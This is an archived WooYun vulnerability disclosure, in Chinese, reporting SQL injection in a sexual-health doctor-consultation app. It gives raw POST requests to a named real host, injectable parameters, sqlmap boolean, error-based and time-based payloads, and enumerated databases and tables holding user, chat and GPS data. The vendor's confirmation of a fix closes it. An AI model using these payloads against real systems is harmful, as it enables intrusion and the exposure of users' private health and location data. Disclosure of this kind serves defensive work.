乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-16: 细节已通知厂商并且等待厂商处理中 2015-04-17: 厂商已经确认,细节仅向厂商公开 2015-04-27: 细节向核心白帽子及相关领域专家公开 2015-05-07: 细节向普通白帽子公开 2015-05-17: 细节向实习白帽子公开 2015-06-01: 细节向公众公开
两性私人医生APP SQL注入漏洞(涉及300多万用户信息)~好羞涩~
POST /client/api.php?randnum=0.8167588198557496 HTTP/1.1Content-Length: 417Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25Accept: */*action=chatnow&doctorid=1&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
参数:doctorid
POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1Content-Length: 361Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25Accept: */*action=login&number=1&password=e&ver=1.3
参数:number
POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1Content-Length: 362Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25Accept: */*action=login&number=e&password=admin&ver=1.3
参数:password
POST /api/m.php?randnum=0.8685849541798234 HTTP/1.1Content-Length: 306Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25Accept: */*action=chatend&chatid=1
参数:chatid
POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1Content-Length: 356Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25Accept: */*action=login&password=e&username=e
POST /api/m.php?randnum=0.3527681708801538 HTTP/1.1Content-Length: 344Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25Accept: */*action=logout&userid=1
参数:userid
POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1Content-Length: 354Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295Host: medapp.ranknowcn.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25Accept: */*action=login&password=e&username=admin
参数:username
http://medapp.ranknowcn.com/client/image.php?key=e
参数:key
---Parameter: doctorid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: action=chatnow&doctorid=-5475' OR 4249=4249#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: action=chatnow&doctorid=-4478' OR 1 GROUP BY CONCAT(0x716a767671,(SELECT (CASE WHEN (1098=1098) THEN 1 ELSE 0 END)),0x71706b7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: action=chatnow&doctorid=1' AND (SELECT * FROM (SELECT(SLEEP(20)))GXDX)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user---web application technology: Nginx, PHP 5.3.5back-end DBMS: MySQL 5.0.12available databases [3]:[*] information_schema[*] lucky_draw[*] medapp
Database: medapp[160 tables]+------------------------------+| lucky_draw.user_bak1 || user || activedate || addrdetailLog || admin || adminpage || advert || advertType || answer || appnews || assign_percentage || bj_base_station || booking || chat || chatFilterWords || chatUpdLog || chatchange || chatclose || chatcomment || chathistory || chatlock || chatsourceLog || chattag || chattemp || city || city2 || city2LAC || city_baidu || cityhospital || cityhospital_keshi || customerlock || dailyStatement || doctor || doctorBak || doctor_autoAssignQuestion || doctor_fastreply || doctor_fastreplyParent || frommsgLog || gps_addr || gps_addrtag || gps_cell || gps_imei || gps_ios_vars || gps_ios_vars_test || gps_m7_data || gps_move_path || gps_notes || gps_points || gps_points_test || gps_pos || gps_raw_data || gps_user_pic || gps_walk_data || gps_wifi || hospital || hospitalSellLog || hospitalSellLog_day || hospitalSellLog_month || hospitalSellLog_oldData || hospitalSellLog_sellPrice || hospitalSellLog_updLog || hospitalSellLog_userTelChat || huodong || huodongReport || importantChatLog || ios_xyz || ios_xyz2 || ios_xyz2_copy || ios_xyz2_copy1 || ios_xyz2_copy2 || ios_xyz_feature || ios_xyz_std || iospush || iospushmsg || iospushmsgTemplate || iospushmsgType || iptable || jihuo || jihuoCountForDate || jihuo_macaddr || logs_doctor || logs_doctorlogin || logs_hospital || logs_question || logs_quotaQuetsionUserVerify || logs_users || meiapp_booking || meiapp_category || meiapp_comment || meiapp_favor || meiapp_intro || meiapp_mm_offer || meiapp_mm_photo || meiapp_mm_vote || meiapp_news || meiapp_news_catid || meiapp_newscategory || meiapp_picture || meiapp_project || meiapp_share || monthlyStatement || office || online || publicQuestion || qa_answer || qa_keyword || qa_question || qa_question_answer || qa_type || question || questionCountForDate || questionDayNum || questionTop || questionType || questionTypeChild || question_all || question_repeatLog || questionhide || quotaHospital || quotaQuestion || quotaQuestion2 || quotaQuestionSearch || quotaQuestionSearch_wuxiao || quotaQuestion_copy || quotaQuestion_test || record || record_copy || regdate || retention || retention_week || roles || sellLog || sina_weibo_access || syslog || t_weibo_access || tempCode || temp_questions || test_activity || uploadFile || user2 || userAddrdetail || userAlias || userBlacklist || userContacts || userDeviceid || userLeaveWords || userLog || userVisitLog || userYanzheng || user_copy || user_guahao || user_guahao_data || user_huoyue || user_mobilemsg || userhide || usersource || weeklyStatement || z_qhp_sell_admin || z_qhp_sell_log || z_qhp_set_selled |+------------------------------+
你懂的
危害等级:高
漏洞Rank:11
确认时间:2015-04-17 14:17
感谢报告,上次清理,有些参数没有处理。现进行了全局传入参数过滤
暂无